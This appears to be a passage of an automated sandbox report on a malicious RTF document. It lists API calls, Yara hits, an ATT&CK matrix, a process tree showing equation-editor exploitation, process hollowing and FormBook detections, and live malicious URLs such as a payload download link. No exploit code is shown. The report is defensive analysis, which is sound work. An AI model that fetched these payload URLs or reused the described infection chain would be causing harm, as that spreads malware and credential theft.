          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,_GetPrimaryLen,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: GetLocaleInfoW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: EnumSystemLocalesW,
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B00A3 cpuid
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\dvukljmnr.exeCode function: 5_2_009B161F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

          Stealing of Sensitive Information

          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match, File source: 6.0.dvukljmnr.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.dvukljmnr.exe.160000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.0.dvukljmnr.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match, File source: 6.2.dvukljmnr.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.dvukljmnr.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000008.00000002.1181975220.0000000000120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1181928628.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000008.00000002.1182016973.0000000000190000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (the digits that precede a technique name are the report's per-technique counts; techniques without digits were not observed):

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 12 Native API | Path Interception | 612 Process Injection | 1 Rootkit | 1 Credential API Hooking | 1 System Time Discovery | Remote Services | 1 Credential API Hooking | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
Default Accounts | 1 Shared Modules | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Masquerading | LSASS Memory | 251 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | Exfiltration Over Bluetooth | 14 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | 23 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 2 Virtualization/Sandbox Evasion | Security Account Manager | 2 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Clipboard Data | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 612 Process Injection | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 123 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 125 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 635413; Sample: Revised RFQ-PO180911.doc; Start date: 27/05/2022; Architecture: WINDOWS; Score: 100
Top-level signatures: Initial sample is an obfuscated RTF file; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures

Behavior graph (process tree):
WINWORD.EXE 291 23 (started)
  dropped: ~WRF{E6E86BED-0A8E...F-02AF74FFE8F6}.tmp, Composite
EQNEDT32.EXE 11 (started)
  DNS/IP: sanbarts.com 194.9.94.86, 49173, 80, LOOPIASE, Sweden; 215ffbc1941f6023.7host.cn 45.120.185.113, 49174, 80, HENGDA-HKHENGDANETWORKLIMITEDHK, Hong Kong; www.sanbarts.com
  dropped: C:\Users\user\AppData\Roaming\word.exe, PE32; C:\Users\user\AppData\Local\...\cssati[1].exe, PE32
  signatures: Office equation editor establishes network connection; Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  word.exe 19 (started)
    dropped: C:\Users\user\AppData\Local\...\dvukljmnr.exe, PE32
    signatures: Multi AV Scanner detection for dropped file
    dvukljmnr.exe (started)
      signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
      dvukljmnr.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
        explorer.exe (injected)
          DNS/IP: sbsfe-p8.geo.mf0.yahoodns.net 98.137.244.37, 49175, 80, YAHOO-GQ1US, United States; www.storyofsol.com; 2 other IPs or domains
          signatures: System process connects to network (likely due to code injection or exploit)
          wuapp.exe (started)
            signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            cmd.exe (started)
Source | Detection | Scanner | Label
Revised RFQ-PO180911.doc | 32% | Virustotal |
Revised RFQ-PO180911.doc | 32% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp | 100% | Avira | EXP/CVE-2018-0798.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe | 9% | Metadefender |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe | 62% | ReversingLabs | Win32.Trojan.FormBook
C:\Users\user\AppData\Local\Temp\dvukljmnr.exe | 69% | ReversingLabs | Win32.Trojan.GenericML
C:\Users\user\AppData\Roaming\word.exe | 9% | Metadefender |
C:\Users\user\AppData\Roaming\word.exe | 62% | ReversingLabs | Win32.Trojan.FormBook
Source | Detection | Scanner | Label
6.0.dvukljmnr.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.dvukljmnr.exe.160000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.0.dvukljmnr.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.2.dvukljmnr.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.0.dvukljmnr.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          No Antivirus matches
Source | Detection | Scanner | Label
http://www.sanbarts.com/YR$ | 0% | Avira URL Cloud | safe
http://sanbarts.com/cssati.exe | 100% | Avira URL Cloud | malware
www.rthearts.com/nk6l/ | 0% | Avira URL Cloud | safe
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.sanbarts.com/cssati.exeC: | 0% | Avira URL Cloud | safe
http://sanbarts.com/33 | 0% | Avira URL Cloud | safe
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://www.sanbarts.com/Couri | 0% | Avira URL Cloud | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://www.sanbarts.com/cssati.exekkC: | 0% | Avira URL Cloud | safe
http://www.sanbarts.com/cssati.exe | 100% | Avira URL Cloud | malware
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://sanbarts.com/cssati.exej | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
215ffbc1941f6023.7host.cn | 45.120.185.113 | true | true | | unknown
sanbarts.com | 194.9.94.86 | true | true | | unknown
sbsfe-p8.geo.mf0.yahoodns.net | 98.137.244.37 | true | true | | unknown
www.sanbarts.com | unknown | unknown | true | | unknown
www.paypal-caseid521.com | unknown | unknown | true | | unknown
www.storyofsol.com | unknown | unknown | true | | unknown
www.createacarepack.com | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://sanbarts.com/cssati.exe | true | Avira URL Cloud: malware | unknown
www.rthearts.com/nk6l/ | true | Avira URL Cloud: safe | low
http://www.sanbarts.com/cssati.exe | true | Avira URL Cloud: malware | unknown
http://www.createacarepack.com/nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://investor.msn.com | explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.sanbarts.com/YR$ | EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sanbarts.com/cssati.exeC: | EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://sanbarts.com/33 | EQNEDT32.EXE, 00000002.00000002.915025383.000000000098D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 00000007.00000000.963238551.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.939397773.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.sanbarts.com/Couri | EQNEDT32.EXE, 00000002.00000002.914993763.0000000000933000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://treyresearch.net | explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sanbarts.com/cssati.exekkC: | EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://java.sun.com | explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000007.00000000.964168110.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.958260640.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.958544011.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.974718954.00000000085F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://investor.msn.com/ | explorer.exe, 00000007.00000000.1024123018.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | | high
http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.971345322.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.947051365.0000000008675000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023929548.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.951705279.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | | high
http://computername/printers/printername/.printer | explorer.exe, 00000007.00000000.954289204.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.%s.comPA | explorer.exe, 00000007.00000000.961585251.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | low
http://www.autoitscript.com/autoit3 | explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org | explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://sanbarts.com/cssati.exej | EQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | | high
